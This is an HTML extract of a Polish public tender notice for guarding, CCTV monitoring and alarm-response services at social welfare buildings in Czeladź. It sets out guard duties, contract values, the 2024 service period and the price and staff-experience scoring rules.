Zam nie będ mó dok wyb najkorz of ze wzgl na to, że zos złoż of o tak sam il punk, wezw on Wyk, któ złożte of do złoż<br/>w term okreś przez Zam of dodat zawier now cenę. Wyk skład of doda, nie mogą zaof cen wyż niż zaof w uprz złoż przez nich ofert<br/>5. W toku bad of i oc of Zamy może żąd od Wyk wyjaś dot treś złoż przez nich of or lub in skład dok lub oś. Wyk są zob do przed<br/>wyja w term wskaz przez Zam<br/>6. Zam wyb najk of w ter zwią of okr na Pl<br/>zak z post<br/>7. Jeż ter związ of upł przed wyb najk of, Zam we<br/>Wyk, któ of otrzy najw oc do wyr w wyz przez<br/>Zam ter pis zg na wyb jeg of<br/>8. W przyp br zg o kt mo w pkt7 of pod odrz, a Zam zw się o wyra tak zg do kolej Wyk, kt of zo naj oc, chy że, zach przes do uniew<br/>post.<br/>9. Zam unie post o udz zam, jeż:9.1nie zł żad wn o dop do ud w pos al żad of;9.2wszy zło wn o dop do udziału w postęp albo of podl<br/>odrz;9.3cena lub koszt najkor of lub of z najn ceną przewy kw, którą zam zami przezna na sfinans zam, chyba że zam może zwiększ<br/>tę kw do ceny lub kosztu najkorzys of;9.4w przypad, o któ mowa w art.248ust.3,art.249i art.250ust.2, zos złoż of dodatk o taj samej<br/>cenie lub koszcie;9.5wystą istotna zmiana okoliczn powod, że prowadz postęp lub wyk zam nie leży w interesie publicz, czego nie<br/>można było wcześniej przewidzieć;<br/>9.6. postępowanie obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy<br/>w sprawie zamówienia publicznego;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Ochrona fizyczna osób i mienia wraz z monitoringiem wizyjnym w budynku MOPS przy ul. Alfreda Biedermanna 2 w Czeladzi.<br/>1.1.	Ochrona fizyczna budynku, instalacji, urządzeń, sprzętu oraz innych składników majątku<br/>w godzinach od 07:00 do 20:30. <br/>1.2.	Ochrona osób mająca na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej w czasie godzin urzędowania Zamawiającego, tj.:<br/>poniedziałek – piątek od godz. 07:00 do 20:30<br/>1.3.	W razie potrzeby reakcja na sygnał grupą interwencyjną <br/>1.4.	Wydawanie i przyjmowanie kluczy do pomieszczeń Zamawiającego osobom uprawnionym.<br/>1.5.	Sprawdzanie pomieszczeń (sanitarnych, gospodarczych) pod kątem zabezpieczenia (np. zamknięte okna, opuszczone żaluzje antywłamaniowe) po godzinach urzędowania Zamawiającego oraz przed zakończeniem ochrony fizycznej. <br/>1.6.	Kontrola wszystkich pomieszczeń po godzinach urzędowania Zamawiającego.<br/>1.7.	Sprawdzanie, czy osoby przebywające w pomieszczeniach Zamawiającego po godzinach pracy są do tego upoważnione. <br/>1.8.	Niewpuszczanie na teren siedziby Zamawiającego osób znajdujących się pod wpływem alkoholu i innych środków odurzających.<br/>1.9.	Codzienne obchody wokół granicy budynku i pisemny raport o czasie, miejscu i rodzaju zdarzenia nadzwyczajnego.<br/>1.10.	Prowadzenie książki raportów, w której winien być udokumentowany pisemnie przebieg służby (przede wszystkim zdarzenia nadzwyczajne) oraz wnioski i sugestie Wykonawcy dotyczące realizacji przedmiotu usługi, a także uwagi na temat niedociągnięć stwierdzonych przez Zamawiającego w czasie służby. <br/>	Książka raportów winna być przedstawiona do wglądu na każde życzenie Zamawiającego.<br/>1.11.	W przypadku zaistnienia zdarzeń zagrażających funkcjonowaniu Ośrodka (po godzinach pracy Zamawiającego) powiadomienie osób funkcyjnych, tj. Dyrektora Ośrodka lub Kierownika Działu Integracji Społecznej i zabezpieczenie miejsca zdarzenia do czasu ustalenia okoliczności i przyczyn zaistnienia zdarzenia i do czasu przybycia wyspecjalizowanych służb (Straży Pożarnej, Policji, Pogotowia Ratunkowego).<br/>1.12.	Sprawdzanie stanu zabezpieczeń, oświetlenia zewnętrznego, instalacji sanitarnych, CO, p.poż. <br/>i innych znajdujących się w budynku. W przypadku zaistnienia usterek, powiadomienie o nich Zamawiającego. <br/>1.13.	Codzienne sprawdzanie i obsługa elektronicznych zabezpieczeń alarmowych, a w przypadku zaistnienia usterek powiadamianie o nich Zamawiającego.<br/>1.14.	Włączanie systemu alarmowego, zamykanie budynku i zabezpieczanie kluczy.<br/>1.15.	Wyłączanie systemu alarmowego, otwieranie budynku.<br/>1.16.	Ochrona fizyczna budynku, instalacji, urządzeń, sprzętu oraz innych składników majątku podczas wyborów prezydenckich, parlamentarnych (krajowych oraz do europarlamentu)<br/>i samorządowych, w godzinach prac komisji wyborczej w sytuacji, gdy lokal wyborczy będzie zlokalizowany w budynku MOPS.<br/>1.17.	Monitoring:<br/>1.	System monitoringu obejmuje:<br/>a)	budynek przy ul. Biedermanna 2 – (kamery wewnętrzne – 14 sztuk)<br/>2.	Obsługa monitoringu realizuje:<br/>a)	bieżącą obserwację (nadzór) kamer systemu monitoringu, <br/>b)	w sytuacjach zaobserwowanych zagrożeń, wypadków, zdarzeń, natychmiastowe powiadamianie grupy interwencyjnej i/lub wyspecjalizowanych służb (np. Straży Pożarnej, Policji, Pogotowia Ratunkowego). <br/>c) niezwłoczne powiadamianie przedstawiciela Zamawiającego o wszelkich zaobserwowanych zdarzeniach, awariach sprzętu i raportowanie zauważonych nieprawidłowości w sprawności kamer i innych urządzeń systemu monitoringu,<br/>1.18	Pracownik ochrony obsługujący system monitoringu zobowiązany jest: <br/>1.	zachować w poufności przetwarzane dane osobowe oraz sposób ich zabezpieczenia, w tym podpisać zobowiązanie, w którym oświadczy, że nie będzie przekazywać, pokazywać lub<br/>w inny sposób ujawniać treści nagrań wideo z nadzoru nikomu, kto nie jest uprawniony do dostępu do nich, <br/>2.	efektywnie współpracować z Policją w zakresie bezpieczeństwa ludzi i mienia, spokoju<br/>i porządku publicznego oraz wymiany informacji w tym zakresie z obserwowanych<br/>i rejestrowanych zdarzeń w miejscach publicznych.<br/>3.	pracownicy Wykonawcy nie mają prawa do przyjmowania osób postronnych na terenie strzeżonych obiektów. <br/>1.19. Wykonawca zobowiązany jest do: <br/>1) prowadzenia nadzoru nad prawidłową i nieprzerwaną pracą operatorów systemu oraz urządzeń monitoringu, <br/>2) chronić system monitoringu przed dostępem i ingerencją z zewnątrz przez zastosowanie środków technicznych i organizacyjnych zapewniających ochronę przetwarzanych danych osobowych, zabezpieczyć dane przed ich udostępnieniem osobom nieupoważnionym oraz działać zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. <br/>z 2019 r. poz. 1781)<br/>2.	Monitoring sygnałów pochodzących z systemów alarmowych całodobowo obejmuje:<br/>2.1.	Wykonawca jest zobowiązany do odbioru przez Alarmowe Centrum Odbiorcze sygnałów alarmowych i technicznych, generowanych przez lokalny system alarmowy klasy &#34;C&#34;.<br/>2.2.	W przypadku stwierdzenia zakłóceń porządku lub zadziałania systemu sygnalizacji włamania, podejmowanie działań interwencyjnych własnymi grupami interwencyjnymi - czas przyjazdu maksymalnie do 10 minut. W trakcie trwania zamówienia Zamawiający może dwukrotnie, bez dodatkowych opłat kontrolować czas dojazdu grupy interwencyjnej do obiektu (wezwanie kontrolne).<br/>2.3.	Wykonawca przekazuje informacje o powstałym zagrożeniu w nadzorowanym obiekcie na stanowisko kierowania terytorialnie odpowiedzialnej jednostki Policji, celem podjęcia interwencji oraz powiadomienia osób wskazanych przez Zamawiającego.<br/>2.4.	Zabezpieczenie trwa do czasu przybycia Zamawiającego w ramach wynagrodzenia za monitoring.<br/>2.5.	Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu każdego przypadku uszkodzenia bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowanie systemu alarmowego.<br/>2.6.	Wykonawca zobowiązany jest również do sporządzania i przedstawiania Zamawiającemu pisemnej notatki ze zdarzeń mających miejsce na terenie chronionego obiektu (podjazdy grup interwencyjnych, koordynowane przez Stację Monitorowania) i przesłania jej niezwłocznie na adres e-mail: mops@mops.czeladz.pl. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 76609,24 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zam kier się będzie następ kryt, z uwzgl odp współcz wag (znacz wyraż w %) dla<br/>tych kryt oraz maks il punk, jaką może otrzy of za dane kryt:1) Cena–waga procent-max60%(C) 2) Doś os wyz do reali zam-max40%<br/>(D)<br/>Of zost ocen za pom syst punkt, zg z poniż kryt:Kryt I-Cena of brutto(C)–max60%<br/>a) Zam przyzna maks licz 60punk of Wyk z najniż ceną brutto za wyk przed zam, zg z formulof, stan Zał nr1do nin.SWZ b) Ilość punk<br/>przyzn pozos of Wyk zost oblicz zg z nast. wz i zaokr do dwóch mjsc po przec<br/>najniższa cena występująca w ofertach<br/>ocena punktowa C = --------------------------------------------------- x60 cena badana<br/>Uw nr1:Zg z art. 225 ust. 2 u Pzp, jeżeli złoż of, któ wyb prowadz do pow u Zam obow podat zg z przep o podat od tow i usł, Zam w<br/>celu oc takiej of dolicz do przedst w niej ceny poda od tow i usł, który miał obow rozl zg z tymi przep. Wyk, skł of, infor Zam czy wyb<br/>of będzie prow do pows u Zam obow podatk, wskc nazwę (rodzaj) tow lub usł, któr dost lub świad będ prow do jego powst, oraz<br/>wskaz ich wart bez kwoty pod i staw podat od tow i usł, która zg z wied wyk będ miała zastose. W powyż przyp wyk pod w formul of<br/>tyl wart netto w odnies do wskaz zakr przed zam, zamieszw miejs przeznacz na wskaz ceny brutto prod stos inforo pow obow podat.<br/>Kryt II–Doś os wyznacz do reali zam(D) wg Zał nr 6<br/>Zam może przyznać maks licz 40pkt. of Wyk.- za wyznacz do reali zada os, która spośr wyznacz os nie posi doś w ochr os i mien<br/>Ogłoszenie nr 2022/BZP 00418056/01 z dnia 2022-10-31<br/>2022-10-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Wyk otrz - 0pkt- za wyznacz do reali zad os, kt spoś wyznacz os posia najmni co naj12–mies doś w ochr os i mien Wyk otrz–20pktza<br/>wyzn do reali zad os któ spoś wyzna os pos najmn co najm24–miesi doś w ochr os i mien Wyk otr–40pkt W przyp skł of na wsz 3<br/>cz Wyk win wyk odp speł war odrę dla czI, dla czII, dla czIII. Uw nr 2: Przy obl pun Zam zase zaokr do dwóch miej po przec wedł<br/>zas, że trzecia cyf po przec od5 w górę powo zaokr drug cyf po przec w górę o1. Jeśli trze cyf po przec jest mniej niż5, to dru cyf po<br/>przec nie ule zmian Zam dok wyb of teg z Wyk, któ of uzy w wyn oc najw licz pun. Przyzn pun poszcz of odb się w oparo wzór: L = C<br/>+ D gdz:<br/>L-lic pun uzys przez of C–licz pun uzys w kryt&#34;cena&#34;.D–licz pun uzy w kryt&#34;Doś os wyznacz do reali zam&#34;<br/>2. Oc bę podl wył of nie podl odrz<br/>3. Za najkorzy zost uz of kt otrz najwi il punk łącz ze wszys kryt<br/>4. W syt, gdy Zam nie będ mó dok wyb najkorz of ze wzgl na to, że zos złoż of o tak sam il punk, wezw on Wyk, któ złożte of do złoż<br/>w term okreś przez Zam of dodat zawier now cenę. Wyk skład of doda, nie mogą zaof cen wyż niż zaof w uprz złoż przez nich ofert<br/>5. W toku bad of i oc of Zamy może żąd od Wyk wyjaś dot treś złoż przez nich of or lub in skład dok lub oś. Wyk są zob do przed<br/>wyja w term wskaz przez Zam<br/>6. Zam wyb najk of w ter zwią of okr na Pl<br/>zak z post<br/>7. Jeż ter związ of upł przed wyb najk of, Zam we<br/>Wyk, któ of otrzy najw oc do wyr w wyz przez<br/>Zam ter pis zg na wyb jeg of<br/>8. W przyp br zg o kt mo w pkt7 of pod odrz, a Zam zw się o wyra tak zg do kolej Wyk, kt of zo naj oc, chy że, zach przes do uniew<br/>post.<br/>9. Zam unie post o udz zam, jeż:9.1nie zł żad wn o dop do ud w pos al żad of;9.2wszy zło wn o dop do udziału w postęp albo of podl<br/>odrz;9.3cena lub koszt najkor of lub of z najn ceną przewy kw, którą zam zami przezna na sfinans zam, chyba że zam może zwiększ<br/>tę kw do ceny lub kosztu najkorzys of;9.4w przypad, o któ mowa w art.248ust.3,art.249i art.250ust.2, zos złoż of dodatk o taj samej<br/>cenie lub koszcie;9.5wystą istotna zmiana okoliczn powod, że prowadz postęp lub wyk zam nie leży w interesie publicz, czego nie<br/>można było wcześniej przewidzieć;<br/>9.6. postępowanie obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy<br/>w sprawie zamówienia publicznego;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Ochrona fizyczna osób i mienia wraz z monitoringiem wizyjnym w budynku MOPS przy<br/>ul. Rynek 22 w Czeladzi.<br/>1.1.	Ochrona fizyczna budynku, instalacji, urządzeń, sprzętu oraz innych składników majątku<br/>w godzinach od 07:00 do 20:00. <br/>1.2.	Ochrona osób mająca na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej w czasie godzin urzędowania Zamawiającego, tj.:<br/>	poniedziałek – piątek od godz. 07:00 do 20:00<br/>1.3.	W razie potrzeby reakcja na sygnał grupą interwencyjną.<br/>1.4.	Wydawanie i przyjmowanie kluczy do pomieszczeń Zamawiającego osobom uprawnionym.<br/>1.5.	Sprawdzanie pomieszczeń (sanitarnych, gospodarczych) pod kątem ich zabezpieczenia (np. zamknięte okna, opuszczone żaluzje antywłamaniowe) po godzinach urzędowania Zamawiającego oraz przed zakończeniem ochrony fizycznej.<br/>1.6.	Kontrola wszystkich pomieszczeń po godzinach urzędowania Zamawiającego.<br/>1.7.	Sprawdzanie, czy osoby przebywające w pomieszczeniach Zamawiającego po godzinach pracy są do tego upoważnione. <br/>1.8.	Niewpuszczanie na teren siedziby Zamawiającego osób znajdujących się pod wpływem alkoholu i innych środków odurzających.<br/>1.9.	Codzienne obchody wokół granicy budynku i pisemny raport o czasie, miejscu i rodzaju zdarzenia nadzwyczajnego.<br/>1.10.	Prowadzenie książki raportów, w której winien być udokumentowany pisemnie przebieg służby (przede wszystkim zdarzenia nadzwyczajne) oraz wnioski i sugestie Wykonawcy dotyczące realizacji przedmiotu usługi, a także uwagi na temat niedociągnięć stwierdzonych przez Zamawiającego w czasie służby. Książka raportów winna być przedstawiona do wglądu na każde życzenie Zamawiającego. <br/>1.11. W przypadku zaistnienia zdarzeń zagrażających funkcjonowaniu Ośrodka (po godzinach pracy Zamawiającego) powiadomienie osób funkcyjnych, tj. Dyrektora Ośrodka lub Kierownika Działu Usług Społecznościowych i Aktywności Lokalnej oraz zabezpieczenie miejsca zdarzenia do czasu ustalenia okoliczności i przyczyn zaistnienia zdarzenia i do czasu przybycia wyspecjalizowanych służb (Straży Pożarnej, Policji, Pogotowia Ratunkowego).<br/>1.12.	Sprawdzanie stanu zabezpieczeń, oświetlenia zewnętrznego, instalacji sanitarnych, gazowych, CO, p.poż i innych znajdujących się w budynku. W przypadku zaistnienia usterek, powiadomienie o nich Zamawiającego. <br/>1.13.	Codzienne sprawdzanie i obsługa elektronicznych zabezpieczeń alarmowych,<br/>a w przypadku zaistnienia usterek powiadamianie o nich Zamawiającego.<br/>1.14.	Włączanie systemu alarmowego, zamykanie budynku i zabezpieczanie kluczy.<br/>1.15.	Wyłączanie systemu alarmowego, otwieranie budynku.<br/>1.16.	Ochrona fizyczna budynku, instalacji, urządzeń, sprzętu oraz innych składników majątku podczas wyborów prezydenckich, parlamentarnych (krajowych oraz do europarlamentu)<br/>i samorządowych, w godzinach prac komisji wyborczej w sytuacji, gdy lokal wyborczy będzie zlokalizowany w budynku MOPS.<br/>1.17.	Monitoring<br/>1.	System monitoringu obejmuje:<br/>a)	Budynek przy ul. Rynek 22 (kamery wewnętrzne – 9 sztuk)<br/>2.	Obsługa monitoringu realizuje:<br/>a)	bieżącą obserwację (nadzór) kamer systemu monitoringu, <br/>b)	w sytuacjach zaobserwowanych zagrożeń, wypadków, zdarzeń, natychmiastowe powiadamianie grupy interwencyjnej i/lub wyspecjalizowanych służb (np. Straży Pożarnej, Policji, Pogotowia Ratunkowego). <br/>c)	niezwłoczne powiadamianie przedstawiciela Zamawiającego o wszelkich zaobserwowanych zdarzeniach, awariach sprzętu i raportowanie zauważonych nieprawidłowości w sprawności kamer i innych urządzeń systemu monitoringu,<br/>1.18	Pracownik ochrony obsługujący system monitoringu zobowiązany jest: <br/>1.	zachować w poufności przetwarzane dane osobowe oraz sposób ich zabezpieczenia,<br/>w tym podpisać zobowiązanie, w którym oświadczy, że nie będzie przekazywać, pokazywać lub w inny sposób ujawniać treści nagrań wideo z nadzoru nikomu, kto nie jest uprawniony do dostępu do nich, <br/>2.	efektywnie współpracować z Policją w zakresie bezpieczeństwa ludzi i mienia, spokoju<br/>i porządku publicznego oraz wymiany informacji w tym zakresie z obserwowanych<br/>i rejestrowanych zdarzeń w miejscach publicznych.<br/>3.	Pracownicy Wykonawcy nie mają prawa do przyjmowania osób postronnych na terenie strzeżonych obiektów. <br/>1.19.	Wykonawca zobowiązany jest do: <br/>1.	prowadzenia nadzoru nad prawidłową i nieprzerwaną pracą operatorów systemu oraz urządzeń monitoringu, <br/>2.	chronić system monitoringu przed dostępem i ingerencją z zewnątrz przez zastosowanie środków technicznych i organizacyjnych zapewniających ochronę przetwarzanych danych osobowych, zabezpieczyć dane przed ich udostępnieniem osobom nieupoważnionym oraz działać zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2019 r. poz. 1781)<br/>2.	Monitoring sygnałów pochodzących z systemów alarmowych całodobowo obejmuje:<br/>2.1.	Wykonawca jest zobowiązany do odbioru przez Alarmowe Centrum Odbiorcze sygnałów alarmowych i technicznych, generowanych przez lokalny system alarmowy klasy &#34;C&#34;.<br/>2.2.	W przypadku stwierdzenia zakłóceń porządku lub zadziałania systemu sygnalizacji włamania, podejmowanie działań interwencyjnych własnymi grupami interwencyjnymi - czas przyjazdu maksymalnie do 10 minut. W trakcie trwania zamówienia Zamawiający może dwukrotnie, bez dodatkowych opłat, kontrolować czas dojazdu grupy interwencyjnej do obiektu (wezwanie kontrolne).<br/>2.3.	Wykonawca przekazuje informacje o powstałym zagrożeniu w nadzorowanym obiekcie na stanowisko kierowania terytorialnie odpowiedzialnej jednostki Policji, celem podjęcia interwencji oraz powiadomienia osób wskazanych przez Zamawiającego.<br/>2.4.	Zabezpieczenie trwa do czasu przybycia Zamawiającego w ramach wynagrodzenia za monitoring.<br/>2.5.	Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu każdego przypadku uszkodzenia bądź jakiejkolwiek innej niesprawności łącza telefonicznego, wykrytego przez stację monitorującą, mających wpływ na monitorowanie systemu alarmowego.<br/>2.6.	Wykonawca zobowiązany jest również do sporządzania i przedstawiania Zamawiającemu pisemnej notatki ze zdarzeń mających miejsce na terenie chronionego obiektu (podjazdy grup interwencyjnych, koordynowane przez Stację Monitorowania) i przesłania jej niezwłocznie na adres e-mail: mops@mops.czeladz.pl </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 82133,58 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zam kier się będzie następ kryt, z uwzgl odp współcz wag (znacz wyraż w %) dla<br/>tych kryt oraz maks il punk, jaką może otrzy of za dane kryt:1) Cena–waga procent-max60%(C) 2) Doś os wyz do reali zam-max40%<br/>(D)<br/>Of zost ocen za pom syst punkt, zg z poniż kryt:Kryt I-Cena of brutto(C)–max60%<br/>a) Zam przyzna maks licz 60punk of Wyk z najniż ceną brutto za wyk przed zam, zg z formulof, stan Zał nr1do nin.SWZ b) Ilość punk<br/>przyzn pozos of Wyk zost oblicz zg z nast. wz i zaokr do dwóch mjsc po przec<br/>najniższa cena występująca w ofertach<br/>ocena punktowa C = --------------------------------------------------- x60 cena badana<br/>Uw nr1:Zg z art. 225 ust. 2 u Pzp, jeżeli złoż of, któ wyb prowadz do pow u Zam obow podat zg z przep o podat od tow i usł, Zam w<br/>celu oc takiej of dolicz do przedst w niej ceny poda od tow i usł, który miał obow rozl zg z tymi przep. Wyk, skł of, infor Zam czy wyb<br/>of będzie prow do pows u Zam obow podatk, wskc nazwę (rodzaj) tow lub usł, któr dost lub świad będ prow do jego powst, oraz<br/>wskaz ich wart bez kwoty pod i staw podat od tow i usł, która zg z wied wyk będ miała zastose. W powyż przyp wyk pod w formul of<br/>tyl wart netto w odnies do wskaz zakr przed zam, zamieszw miejs przeznacz na wskaz ceny brutto prod stos inforo pow obow podat.<br/>Kryt II–Doś os wyznacz do reali zam(D) wg Zał nr 6<br/>Zam może przyznać maks licz 40pkt. of Wyk.- za wyznacz do reali zada os, która spośr wyznacz os nie posi doś w ochr os i mien<br/>Ogłoszenie nr 2022/BZP 00418056/01 z dnia 2022-10-31<br/>2022-10-31 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Wyk otrz - 0pkt- za wyznacz do reali zad os, kt spoś wyznacz os posia najmni co naj12–mies doś w ochr os i mien Wyk otrz–20pktza<br/>wyzn do reali zad os któ spoś wyzna os pos najmn co najm24–miesi doś w ochr os i mien Wyk otr–40pkt W przyp skł of na wsz 3<br/>cz Wyk win wyk odp speł war odrę dla czI, dla czII, dla czIII. Uw nr 2: Przy obl pun Zam zase zaokr do dwóch miej po przec wedł<br/>zas, że trzecia cyf po przec od5 w górę powo zaokr drug cyf po przec w górę o1. Jeśli trze cyf po przec jest mniej niż5, to dru cyf po<br/>przec nie ule zmian Zam dok wyb of teg z Wyk, któ of uzy w wyn oc najw licz pun. Przyzn pun poszcz of odb się w oparo wzór: L = C<br/>+ D gdz:<br/>L-lic pun uzys przez of C–licz pun uzys w kryt&#34;cena&#34;.D–licz pun uzy w kryt&#34;Doś os wyznacz do reali zam&#34;<br/>2. Oc bę podl wył of nie podl odrz<br/>3. Za najkorzy zost uz of kt otrz najwi il punk łącz ze wszys kryt<br/>4. W syt, gdy Zam nie będ mó dok wyb najkorz of ze wzgl na to, że zos złoż of o tak sam il punk, wezw on Wyk, któ złożte of do złoż<br/>w term okreś przez Zam of dodat zawier now cenę. Wyk skład of doda, nie mogą zaof cen wyż niż zaof w uprz złoż przez nich ofert<br/>5. W toku bad of i oc of Zamy może żąd od Wyk wyjaś dot treś złoż przez nich of or lub in skład dok lub oś. Wyk są zob do przed<br/>wyja w term wskaz przez Zam<br/>6. Zam wyb najk of w ter zwią of okr na Pl<br/>zak z post<br/>7. Jeż ter związ of upł przed wyb najk of, Zam we<br/>Wyk, któ of otrzy najw oc do wyr w wyz przez<br/>Zam ter pis zg na wyb jeg of<br/>8. W przyp br zg o kt mo w pkt7 of pod odrz, a Zam zw się o wyra tak zg do kolej Wyk, kt of zo naj oc, chy że, zach przes do uniew<br/>post.<br/>9. Zam unie post o udz zam, jeż:9.1nie zł żad wn o dop do ud w pos al żad of;9.2wszy zło wn o dop do udziału w postęp albo of podl<br/>odrz;9.3cena lub koszt najkor of lub of z najn ceną przewy kw, którą zam zami przezna na sfinans zam, chyba że zam może zwiększ<br/>tę kw do ceny lub kosztu najkorzys of;9.4w przypad, o któ mowa w art.248ust.3,art.249i art.250ust.2, zos złoż of dodatk o taj samej<br/>cenie lub koszcie;9.5wystą istotna zmiana okoliczn powod, że prowadz postęp lub wyk zam nie leży w interesie publicz, czego nie<br/>można było wcześniej przewidzieć;<br/>9.6. postępowanie obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy<br/>w sprawie zamówienia publicznego;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału <br/>w postępowaniu.<br/>2. Na podstawie art.112 ustawy Pzp, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym – Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Wykonawca musi posiadać uprawnienia/licencje do wykonywania działalności polegającej na ochronie osób i mienia zgodnie z przepisami ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz. U. z 